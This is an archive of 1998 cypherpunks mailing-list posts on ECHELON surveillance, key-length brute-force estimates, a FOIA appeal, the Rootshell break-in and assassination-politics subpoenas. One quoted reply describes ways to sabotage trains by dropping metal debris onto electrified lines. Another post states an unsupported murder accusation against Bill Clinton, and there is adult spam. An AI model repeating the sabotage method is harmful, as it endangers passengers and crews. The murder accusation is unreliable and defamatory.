The Farm Service Agency lost 28, or seven percent, of its 403
technology staff in the first six months of fiscal 1998. Lucrative
finders' fees and big salaries in the private sector have taken
their toll on the government's ability to hire programmers. The
Veterans Affairs Department, Justice Department and
Environmental Protection Agency reported having problems
hiring programmers.

Federal agencies aren't the only organizations having hiring and
retention difficulties. Contractors are having an equally tough
time competing for valuable workers.

For example, at the Patent and Trademark Office, Y2K fixes
were delayed three months on one of the office's systems after
a contractor was unable to hire qualified staff for the project.
PTO had to terminate its task order with the company and find
a new contractor.

A State Department contractor lost key technology personnel,
resulting in a three month delay on Y2K work for the
department's Management, Policy and Planning Information
System.

GAO noted that agencies reported delays in Y2K work for
only six mission critical systems, adding that "it is not possible
to determine the full extent or severity of personnel shortages
from these concerns because they are often anecdotal."

The federal government has taken several steps to attract Y2K
workers. The Office of Personnel Management announced that
agencies could waive the reduction of pensions for
re-employed retired military officers and waivers of the
reduction of pay for rehired civilian annuitants who need to be
brought back on to fix agency computers.

In addition, agencies can offer lump-sum payments of up to 25
percent of basic pay to a new employee or to an employee
who must relocate. Agencies can also use retention bonuses of
up to 25 percent of basic pay. Performance awards of up to
$10,000 are also available.

The President's Council on Year 2000 Conversion and the
Chief Information Officers Council are looking at ways to help
agencies hire and retain information technology staff, but GAO
said no organization is working with agencies individually to
help them find Y2K staff.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Oct 1998 12:28:25 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ECHELON: America's Spy in the Sky
Message-ID: <199810290400.UAA14896@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Patrick Poole <ppoole@fcref.org>
Subject: IP: ECHELON: America's Spy in the Sky
Date: Wed, 28 Oct 1998 17:27:26 -0500
To: ignition-point@majordomo.pobox.com

The Free Congress Foundation is pleased to announce that the fourth
installment in our "Privacy Papers" series is now available online.
Entitle "ECHELON: America's Spy in the Sky," you can read about how the
National Security Agency has established a global surveillance system
that monitors every phone, fax and email message sent around the world.
Read the report's Executive Summary below, and then read the report in
its entirety at:

http://www.freecongress.org/ctp/echelon.html

Executive Summary

In the greatest surveillance effort ever established, the US National
Security Agency (NSA) has created a global spy system, codename ECHELON,
which captures and analyzes virtually every phone call, fax, email and
telex message sent anywhere in the world. ECHELON is controlled by the
NSA and is operated in conjunction with the General Communications Head
Quarters (GCHQ) of England, the Communications Security Establishment
(CSE) of Canada, the Australian Defense Security Directorate (DSD), and
the General Communications Security Bureau (GCSB) of New Zealand. These
organizations are bound together under a secret 1948 agreement, UKUSA,
whose terms and text remain under wraps even today.

The ECHELON system is fairly simple in design: position intercept
stations all over the world to capture all satellite, microwave,
cellular and fiber-optic communications traffic, and then process this
information through the massive computer capabilities of the NSA,
including advanced voice recognition and optical character recognition
(OCR) programs, and look for code words or phrases (known as the ECHELON
"Dictionary") that will prompt the computers to flag the message for
recording and transcribing for future analysis. Intelligence analysts at
each of the respective "listening stations" maintain separate keyword
lists for them to analyze any conversation or document flagged by the
system, which is then forwarded to the respective intelligence agency
headquarters that requested the intercept.

But apart from directing their ears towards terrorists and rogue states,
ECHELON is also being used for purposes well outside its original
mission. The regular discovery of domestic surveillance targeted at
American civilians for reasons of "unpopular" political affiliation or
for no probable cause at all in violation of the First, Fourth and Fifth
Amendments of the Constitution - are  consistently impeded by very
elaborate and complex legal arguments and privilege claims by the
intelligence agencies and the US government. The guardians and
caretakers of our liberties, our duly elected political representatives,
give scarce attention to these activities, let alone the abuses that
occur under their watch. Among the activities that the ECHELON targets
are:

Political spying: Since the close of World War II, the US intelligence
agencies have developed a consistent record of trampling the rights and
liberties of the American people. Even after the investigations into the
domestic and political surveillance activities of the agencies that
followed in the wake of the Watergate fiasco, the NSA continues to
target the political activity of "unpopular" political groups and our
duly elected representatives. One whistleblower charged in a 1988
Cleveland Plain Dealer interview that, while she was stationed at the
Menwith Hill facility in the 1980s, she heard real-time intercepts of
South Carolina Senator Strom Thurmond. A former Maryland Congressman,
Michael Barnes, claimed in a 1995 Baltimore Sun article that under the
Reagan Administration his phone calls were regularly intercepted, which
he discovered only after reporters had been passed transcripts of his
conversations by the White House. One of the most shocking revelations
came to light after several GCHQ officials became concerned about the
targeting of peaceful political groups and told the London Observer in
1992 that the ECHELON dictionaries targeted Amnesty International,
Greenpeace, and even Christian ministries.

Commercial espionage: Since the demise of Communism in Eastern Europe,
the intelligence agencies have searched for a new justification for
their surveillance capability in order to protect their prominence and
their bloated budgets. Their solution was to redefine the notion of
national security to include economic, commercial and corporate
concerns. An office was created within the Department of Commerce, the
Office of Intelligence Liaison, to forward intercepted materials to
major US corporations. In many cases, the beneficiaries of this
commercial espionage effort are the very companies that helped the NSA
develop the systems that power the ECHELON network. This incestuous
relationship is so strong that sometimes this intelligence information
is used to push other American manufacturers out of deals in favor of
these mammoth US defense and intelligence contractors, who frequently
are the source of major cash contributions to both political parties.

While signals intelligence technology was helpful in containing and
eventually defeating the Soviet Empire during the Cold War, what was
once designed to target a select list of communist countries and
terrorist states is now indiscriminately directed against virtually
every citizen in the world. The European Parliament is now asking
whether the ECHELON communications interceptions violate the sovereignty
and privacy of citizens in other countries. In some cases, such as the
NSA's Menwith Hill station in England, surveillance is conducted against
citizens on their own soil and with the full knowledge and cooperation
of their government.

This report suggests that Congress pick up its long-neglected role as
watchdog of the Constitutional rights and liberties of the American
people, instead of its current role as lap dog to the US intelligence
agencies. Congressional hearings ought to be held, similar to the Church
and Rockefeller Committee hearings in the mid-1970s, to find out to what
extent the ECHELON system targets the personal, political, religious,
and commercial communications of American citizens. The late Senator
Frank Church warned that the technology and capability embodied in the
ECHELON system represented a direct threat to the liberties of the
American people. Left unchecked, ECHELON could be used by either the
political elite or the intelligence agencies themselves as a tool to
subvert the civil protections of Constitution and to destroy
representative government in the United States.


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 29 Oct 1998 03:42:59 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199810281904.UAA08814@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Being paid to be paranoid, I prefer to use averages instead of
absolutes.  So your numbers would then be:

56 bits -- ( 2^56 / 3.88E12 )*0.5 = 2.6 hours
64 bits -- ( 2^64 / 3.88E12)*0.5 = 27.5 days
80 bits -- ( 2^80 / 3.88E12)*0.5 = 36.5 years
128 bits -- ( 2^128 / 3.88E12)*0.5 = 1.4E18 years.

So a brute force on a 56 bit key would take, on average, 2.6 hours--
using your computational power assumption below-- with half of all
keys brute forced being found before that time and half being found
after that time and most being found around 2.6 hours.  This is
assuming a fairly random distribution of keys within a large set of
keys to be attacked.  You can meter your level of safety by changing
the minimum average percentage of keys found (50%, 25%, 75%) to your
taste (or management's taste) or by increasing the key size.

me.

- -----Original Message-----
From:	Harvey Rook (Exchange) [SMTP:hrook@exchange.microsoft.com]
Sent:	Wednesday, October 28, 1998 11:01 AM
To:	cypherpunks@cyberpass.net
Subject:	Speed records, and brute force state of the art.

- From the New York Times...

WASHINGTON-The Energy Department will take delivery on Wednesday of
what the
Government says is the world's fastest computer, capable of a peak
performance of 3.88 trillion calculations, or teraflops, a second. 

Just to simplify things, let's assume that 1 flop == 1 decryption. I
know
that's not true, but it's very close, and it's certainly less than one
order
of magnitude off.

So, with this assumption how long does it take to break various key
sizes?

56 bits -- 2^56 / 3.88E12 = 5.2 hours
64 bits -- 2^64 / 3.88E12 = 55 days
80 bits -- 2^80 / 3.88E12 = 9873 years
128 bits -- 2^128 / 3.88E12 = 2.8E18 years.

And now you know.

Harv.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

iQA/AwUBNjcVv3UkEFXvH2ZAEQJRJQCeOPXRZpMwlFKHjUWktgBMRSL626sAnR/m
TJAfMTXEdf5pYW+rLiACRlWD
=WYHJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 29 Oct 1998 11:06:09 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199810290248.UAA16922@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 29 Oct 1998 00:32:00 +0100
> From: Anonymous <nobody@replay.com>

> In the following snippet of pseudo-code, what should the value of
> SWAP_TIMES be to make the array A[] random, assuming
> that getrand() returned a truly random integer between
> 0 and 255
> 
> A[256];
> 
> for(i=0;i<SWAP_TIMES;i++){
> 	x=getrand();
> 	y=getrand();
> 	swap(A[x],A[y]);
> }

Each x and y is in and of itself random? If so it doesn't matter how often
you swap the elements.

While there are clearly different levels of pseudo-randomness, true
randomness is or isn't.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Thu, 29 Oct 1998 11:49:55 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: MIB Subpoenas
In-Reply-To: <v0313030fb25d0e67bc14@[209.66.100.110]>
Message-ID: <3637E001.F65DB99B@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





Tim May wrote:

> I advise any of you with links to the idea of anonymous murders and AP to
> do the same. Soon.

Fleeing the tidal(thoughtcrime)wave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 29 Oct 1998 12:33:56 +0800
To: cypherpunks@toad.com
Subject: Assassin Report
Message-ID: <199810290351.WAA21867@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We offer the DoJ report on assassination
intelligence and threat assessment investigations,
cited in the post on "shared traits of potential
assassins:"

   http://jya.com/ncj170612.htm  (110K)

It's quite surprising in that the recommended policy
is to not arrest potential assassins but to attempt to
persuade them to give up their plans to attack, to 
establish trust in the LEAs who are encouraged to 
listen to grievances, and helpfully arrange for 
treatment of whatever underlies the menace.

It seems that most who threaten assassination do
not go through with it, but do enjoy the attention it
gets, so the report reassuringly states. Hmm.

True, there are some indicators of imminent threat
that warrant more severe measures -- such as the
subject's acquistion of weapons, participation in 
militant organizations and persistent stalking of
targets.

And, yes, a few performance artists want to be killed 
on TV.

It says that most of the tiny number (83 in 50 years) of 
actual "assassins, attackers and near-lethal approachers" 
(compared to the far larger number who only talk 
about it) are deliberate in their planning and highly
rational about why the deed is necessary -- even
those who are mentally unstable are totally sane
in preparing for and executing attacks.

All in all, the report says assassination is not a big deal
for it doesn't happen all that much, and the task at hand 
is to prevent rash acts by friendly persuasion and TLC.
And brace for the assassins who never give a clue of
what's coming.

Amazing.

So what is going on with CJ and Jim Bell? Scare sense 
into them, followed by caregiving, or serious jail time?

Recall that the Secret Service (which co-authored the report)
had a friendly talk with CJ about assassination threats not long 
before he was arrested by Jeff Gordon. Which fits the report's
policy.

Is the IRS out of touch with progressive law enforcement? Putting
on a show for effect? Or is Washington State truly a murderous 
nest of mad dog killers? Other than Microsoft.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Thu, 29 Oct 1998 08:02:38 +0800
To: redrook@yahoo.com
Subject: Re: Using a password as a private key.
In-Reply-To: <19981027215307.3786.rocketmail@send1d.yahoomail.com>
Message-ID: <m0zYdlv-0003b7C@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



>&#130;&#130;&#130;&#130;Assymetic crypto systems such as
>Diffie-Hellman, El-Gamel, and DSS, allow the private key to be a
>randomly chosen number. &#130;But, as a cute hack, instead of using a
>random number, for the private key, you could use a hash of the User
>Name, and a password. 

That has been proposed in the context of elliptic curve cryptography
where the keys don't need much entropy. I think George Barwood's
pegwit works that way.

I don't like the idea though. You're giving everybody the chance to
run a password guessing attack on your secret key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 29 Oct 1998 13:14:08 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Commerce FOIA Fails - Department Orders New Search
Message-ID: <v04020a03b25d9aa132dc@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Wed, 28 Oct 1998 17:40:42 -0500 (EST)
To: ignition-point@majordomo.pobox.com
From: softwar@us.net (CharlesSmith)
Subject: IP: Commerce FOIA Fails - Department Orders New Search
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: softwar@us.net (CharlesSmith)

Softwar is pleased to announce the successful challenge and appeal
of a failed U.S. Commerce Department Freedom of Information request.

On Oct. 13, 1998 the Commerce Department returned materials responsive
to a request on the Computer Systems Policy Project or CSPP.  The
material returned included a note from the Commerce Department stating
that this was the "final" and "complete" response.

However, the Commerce Department did not include several documents
previously obtained from both Commerce and the National Security
Council (NSC) on the CSPP.  Thus, the Commerce Department response
was neither "final" nor "complete.

Commerce officials who reviewed the Softwar appeal have agreed the
search was incomplete and did violate the Freedom of Information Act.
Commerce officials have notified me that they are now ordering the
entire agency re-do the search.

In fact, all materials from 1994 and 1995 on the CSPP were missing
from the Commerce response, including public domain reports written
by the CSPP.  The public domain reports were discovered in a previous
unrelated FOIA search of Ron Brown's files.  The 1994 and 1995 reports
included the name and address of Podesta Associates as the official
contact for CSPP.

In 1995 Bill Reinsch wrote a memo to Ron Brown detailing a secret
meeting with the CSPP, a group of computer CEOs, consisting of Apple,
AT&T, Compaq, Cray, Silicon Graphics, Digital Equipment
Corporation, Tandem, Sun and Unisys.

You can see parts of that secret meeting memo at
http://www.softwar.net/cspp.html

In 1995 the CSPP lobby group was led by Ken Kay, an employee of
Tony Podesta, the brother of White House advisor John Podesta.
In 1995, John Podesta worked at the White House running encryption
and super computer policy.  During the same period of time, the
CSPP and Clinton officials began holding a series of classified
briefings on encryption and super computer export policy.  Part of
the classified materials given to CSPP members included secret
designs for software and hardware products containing "back-doors"
to allow unrestricted monitoring by the government.

John Podesta is now Clinton's Chief of Staff.

==================================================================
FOIA appeal as follows -

SOFTWAR
7707 Whirlaway Drive
Midlothian, VA  23112

October 16, 1998

ASSISTANT GENERAL COUNSEL FOR ADMINISTRATION
ROOM 5898-C
U.S. DEPARTMENT OF COMMERCE
14TH AND CONSTITUTION AVE. N.W.
WASHINGTON, D.C. 20230

RE:  FREEDOM OF INFORMATION ACT APPEAL - CRRIF 98-166

Dear Sir/Madam:

Pursuant to the Freedom of Information Act, 5 USC 552, and to the
regulations of the Commerce Department, CDR (citation to departmental
regulations, obtainable from committee print index), I hereby appeal
the Commerce Department denial of my FOIA request dated February 10,
1998 for all information on "the Computer Systems Policy Project
(CSPP)"  (Please see example #1 - FOIA request of February 10,
1998.)

1.  The Commerce Department denial stated in the reply dated, October
13, 1998, that it has completed all searches and returned the "FINAL
response" for the FOIA request dated February 10, 1998 for all
information on "the Computer Systems Policy Project (CSPP)".
(Please see example #2 Commerce response dated Oct. 13, 1998).
The Commerce Department statement that it has completed all searches
and returned a "FINAL" result is incorrect because responsive
documents from the Commerce Department were NOT RETURNED.

2.  Several U.S. Commerce Department documents previously obtained
through the Freedom of Information Act were NOT returned by the Commerce
Department in response to the specific FOIA request dated February 10,
1998 for all information on "the Computer Systems Policy Project (CSPP)".

3.  I have attached part of one such example, two pages from a U.S.
Commerce Department memo for Secretary Ron Brown   This document is
clearly responsive to my FOIA request of Feb. 10, 1998 because the
subject material is a meeting between the Secretary of the Commerce
and CSPP members.  (Please see example #3, Memo from William Reinsch
to Ron Brown dated June 1, 1995 - CSPP MEETING).

4.  I have obtained several responsive documents that are sourced
from the U.S. Commerce Department and were NOT discovered nor returned
by the Department.  The document cited in item #3 above is only a single
example.

5.  The Commerce Department has performed an INCOMPLETE search and
is in violation of the Freedom of Information Act, 5 USC 552.  The
Commerce Department has not complied with the Freedom of Information
Act, 5 USC 552, because it is unable or unwilling to perform complete
FOIA requests.

Please reply by November 10, 1998.  If the appeal is denied, please
specify the section of the Freedom of Information Act which is being
relied on as a legal basis for the denial.

Thank you.

Charles R. Smith
================================================================
1 if by land, 2 if by sea.  Paul Revere - encryption 1775
Charles R. Smith
SOFTWAR         http://www.softwar.net      softwar@softwar.net
Pcyphered SIGNATURE:
BCD2F14ABC8673D9A29401CC86277FA620FE6A979B822B3120EEFA251BD8CB76
2AA47721F2F9ADAC14A0E2D38AB43FADD718819DB7D9874A50724ACB0B0E7E7C
6D7A633ED076B31B
================================================================
SOFTWAR EMAIL NEWSLETTER                            10/28/1998
***  to unsubscribe reply with "unsubscribe" as subject    ***
================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hot248@bigfoot.com
Date: Thu, 29 Oct 1998 13:55:12 +0800
To: cypherpunks@toad.com
Subject: What's Up!
Message-ID: <199810290516.XAA14764@gus.ntview.com>
MIME-Version: 1.0
Content-Type: text/plain



<html>
<body>
<font size=5><p>To experience the hottest, hardest, female sex site on the net:</p>
<p>CLICK HERE FOR HOT WOMEN!</p>
<p>Or if you prefer some hot, gay male action:</p>
<p>CLICK HERE FOR GAY MEN</font></p>
<p><font size=3>This is an unsoliscited e-mail of an adult nature. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.</p>
</body>
</html>

To experience the hottest, hardest, female sex site on the net:
CLICK HERE FOR HOT WOMEN
http://village.fortunecity.com/degeneres/567/is/

Or if you prefer some hot, gay male action:
CLICK HERE FOR GAY MEN
http://village.fortunecity.com/degeneres/567/hc/

This is an unsoliscited e-mail of an adult nature. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: real@freenet.edmonton.ab.ca
Date: Thu, 29 Oct 1998 15:05:50 +0800
To: Cypherpunks <riburr@shentel.net>
Subject: Re: MIB Subpoenas
In-Reply-To: <3637E001.F65DB99B@shentel.net>
Message-ID: <199810290624.XAA32754@freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



Date sent:      	Wed, 28 Oct 1998 22:24:49 -0500
From:           	Frederick Burroughs <riburr@shentel.net>
To:             	Cypherpunks <cypherpunks@ns.minder.net>
Subject:        	Re: MIB Subpoenas
Send reply to:  	Frederick Burroughs <riburr@shentel.net>

> 
> 
> Tim May wrote:
> 
> > I advise any of you with links to the idea of anonymous murders and AP to
> > do the same. Soon.
> 
> Fleeing the tidal(thoughtcrime)wave.

 Jeff Gordon's appearance on this list coincided with the apearance 
of a yellow streak down Tim's back.
                   Graham-John Bullers
     edmc.net           ab756@freenet.toronto.on.ca
              moderator of alt.2600.moderated
    http://www.freenet.edmonton.ab.ca/~real/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Thu, 29 Oct 1998 13:32:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: MIB Subpoenas
In-Reply-To: <Version.32.19981028133337.011346a0@pop.pipeline.com>
Message-ID: <3.0.3.32.19981028234903.034b1ad0@rboc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 12:23 PM 10/28/98 -0800, Tim May wrote:
>I advise any of you with links to the idea of anonymous murders and AP to
>do the same. Soon.

Actually I was thinking of trying to get ahold of Jim Bell and get
permission to publish Assassination Politics in Hardback along with other
info.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 30 Oct 1998 01:00:39 +0800
To: Hal Lockhart <smb@research.att.com>
Subject: Re: log files (was: Re: dbts: Cryptographic Dog Stocks, The  Dirigible Biplane, and Sending the Wizards Back to Menlo Park )
In-Reply-To: <199810281713.MAA29423@postal.research.att.com>
Message-ID: <v03110743b25ddd553df0@[209.109.232.112]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:35 PM -0800 10/28/98, Hal Lockhart wrote:
>2) (Future) Allow only strongly authenticated users.  Either a) they are
>legitimate users whose identity is known and will presumably not try to
>hack the system, or b) they are attackers who have done something like
>steal the key of a legitimate user.  In the later case, I admit you might
>want to see what they are typing, but it will not give you any information
>about the underlying problem -- their ability to obtain unauthorized keys.

There is a long history of legitimate users who attempt to exceed their
authorization.  Double agents in the intelligence community and embezzlers
in the commercial world both come to mind.


-------------------------------------------------------------------------
Bill Frantz       | Macintosh: Didn't do every-| Periwinkle -- Consulting
(408)356-8506     | thing right, but did know  | 16345 Englewood Ave.
frantz@netcom.com | the century would end.     | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Thu, 29 Oct 1998 09:38:06 +0800
To: cypherpunks@cyberpass.net
Subject: Rootshell.com hacked via SSH
Message-ID: <Pine.BSF.3.96.981029015104.8433A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



Anybody here have any idea how this was done? This one has me rather
concerned...

http://www.rootshell.com/beta/news.html

On Wed Oct 28th at 5:12AM PST the main Rootshell page was defaced by a
group of crackers. Entry to the machine was made via SSH (secure shell)
which is an encrypted interface to the machine at 04:57AM PST this
morning. Rootshell was first informed of this incident at 6:00 AM PST and
the site was immediately brought offline. The site was back up and
operational by 8:00AM PST.

We are still in the process of investigating the exact methods that were
used. The paranoid MAY want to disable ssh 1.2.26. Rootshell runs Linux
2.0.35, ssh 1.2.26, qmail 1.03, Apache 1.3.3 and nothing else. The
attackers used further filesystem corruption to make it harder to remove
the damaged HTML files.



-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 29 Oct 1998 19:35:26 +0800
To: "Brown, R Ken" <petro@playboy.com>
Subject: RE: Soccer Moms?
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F853D@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Petro said:

> I am currently in the process of catching up on C-punks, 
> did this get answered to your satisfaction?

And more :-)


Ken




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Thu, 29 Oct 1998 21:43:52 +0800
To: brownrk1@texaco.com
Subject: RE: airline id
Message-ID: <19981029125342.6578.rocketmail@send101.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Interesting, I like that.  It makes sense.  Bill Clinton knows all
about putting things in fromt of trains, like the two kids who found
his secret cocain dumping ground in Arkansas when he was governor, so
he dumped their two bodies on a train track and the train (spotting
them, like you said Ken) tried to stop but hit them.  Further
investigation found that they had died of a massive hemorage, but
Clinton's honest people told the public that they had "fallen asleep
on the railroad tracks and were accidently hit by a train." 
Convenient, if I've ever noticed.
    I guess the thing with trains is that they are fun and a nice
ride, but modern societies push to get there quickly escalates about
as fast as inflation, so the demand to fly is becmoming more popular
as time goes on.  I think in the future, the only need for trains will
be for shipping us cpunks off to the concentration camps, seeing as
most are only accessible by train or helicopter anyway.  We'll see
though.   




---"Brown, R Ken" <brownrk1@texaco.com> wrote:
>
> Various anonymes and Joel O'Connor discussed sabotaging trains -
> presumably in order to force 
> 
> >>you flew to.  Even with trains, all's it will take is one bomb and 
> >> youbetter believe security will be pumped up as high as it is 
> >> with airlines. 
> 
> > Naaah, you pull rail-spikes to get trains, no big ba-da-boom
required.
> > And it does happen.
> > 
> > 
> Actually you just put something on the  line. It happens all the time.
> If a fast train hits it there can be big problems.  
> 
> Even a small obstacle (like a plastic rubbish bag with rubbish in it)
> will cause a train to stop if it is seen. (Trains can't swerve). That
> just causes inconvenience, unless of course you put something
conductive
> down that shorts out the power - that has a (small) chance of
causing a
> serious accident and a (big) chance of disrupting all rail traffic for
> miles around for hours. A sort of occasionally fatal denial of service
> attack.  It appeals to 14 year olds. You too can make 75,000 people
late
> for work, cause 30,000 pounds worth of damage and possibly kill a
train
> driver. 
> 
> In fact it is so easy to do (all you need to find is a bridge over the
> line & a time when no-one is looking, and heave over  a stolen
> supermarket trolley or an old fridge door from a dump, or any other
bit
> of metal rubbish) it is almost surprising that it doesn't happen more
> often. IIRC, the IRA never tried to disrupt train traffic into or
out of
> London by putting things on the lines, always by bomb scares in
> stations. There was one real bomb on a train,  went off just after it
> arrived at Victoria, killed a couple of people. It was a train I
> regularly used, although I usually travelled later in the day. It got
> much harder to put bombs on trains, or in stations, after that. The
main
> fixes were removing the litter bins from around stations  (it took the
> IRA to teach the messy English to clean up after themselves) and
getting
> people to report unclaimed packages and then evacuating trains when
they
> were found. If you leave yout bag on the train  they stop the train.
> This makes people angry. So there is social pressure to not leave
> packages lying around on, or near,  trains.  So if you want to plant a
> bomb on a crowded train and not get blown up yourself you have a
> problem. On trains, unlike planes, you keep your luggage with you.
> 
> Also people *like* trains. They are cute. Even in America you have
> hordes of trainspotters and steam enthusiasts and model-builders and
all
> the rest. It always amazes me that bookshops have more shelves of
> hobbyist books about trains than about cars, but only about 15% of the
> population regularly travel by train and about 60% by car. (In
England -
> I guess in the USA that's more like 5% and 85% - and before you say
that
> that last figure is too low remember there are an awful lot more
> disabled, vey old, very sick or imprisoned people than most of us
notice
> - I guess that car users in the USA include just about everyone
capable
> of using a car, with the possible exception of the inhabitants of some
> parts of very big cities)
> 
> Back to the point - the reason you need id to travel on a plane is
> because people are scared of planes. Especially they are scared of
them
> falling out of the sky, depressurising or catching fire.  When
something
> goes wrong with a plane everybody can die very quickly.  When an
> accident happens to a train it usually just comes to a halt. They
don't
> have heaps of fuel on them (except if you are on an line that is still
> back in the diesel age - and even then the fuel is usually all in one
> location, separated from the passengers) You mostly don't die whan a
> train crashes, or even blows up.
> 
> Repressive laws get popular support from people who are scared. People
> are scared of plane crashes so they put up with  -no, they mostly
> applaud or even demand -  treatment  they wouldn't stand for anywhere
> else. People aren't scared of trains.  
> 
> Nobody's scared of cryptography - well, nobody wh hasn't received the
> NSA corporate injection - but some peope are scared of
> drugs/paedophiles/terrorists etc, so thats the way in for the
jackboots.
> To oppose it we need to reduce fear. 
> 
> 
> Ken Brown
> 
> (who prefers bicycles to trains but had to use the train to get to
work
> today because  of a broken spoke he is incapable of fixing. He only
does
> software)
> 
> > ----------
> > From: 	Anonymous[SMTP:nobody@replay.com]
> > Sent: 	28 October 1998 17:36
> > To: 	cypherpunks@toad.com
> > Subject: 	airline id
> > 
> > At 12:43 PM 10/27/98 -0800, Joel O'Connor wrote:
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> >   
> > 
> > 
> > 
> > 
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 29 Oct 1998 20:23:20 +0800
To: "Brown, R Ken" <frissell@panix.com>
Subject: RE: UK police chase crooks on CCTV (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F853E@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> So when are they going to arrest Gorby and Fidel?  They killed more
people.

Castro I assume the moment he steps foot in the USA other than on a
diplomatic mission. I've no idea about   Gorbachev, I assume as a KGB
official he was party to the same sort of behaviour as Pinochet was, but
when he got to the top at least he didn't make things worse. Anyway,
what about Oliver North?  And since when did our inability to catch all
criminals stop us prosecuting the ones  we can catch?

It looks like Pinochet will probably get released in England because of
the vile, immoral, doctrine of "sovereign immunity", i.e. that people in
office don't get prosecuted for crimes committed as part of the job. But
it was still fun to see him caught. 

The real reason Pinochet ought to have the wind put up him is exactly
*because* what he did seemed to have worked and was taken to be worth
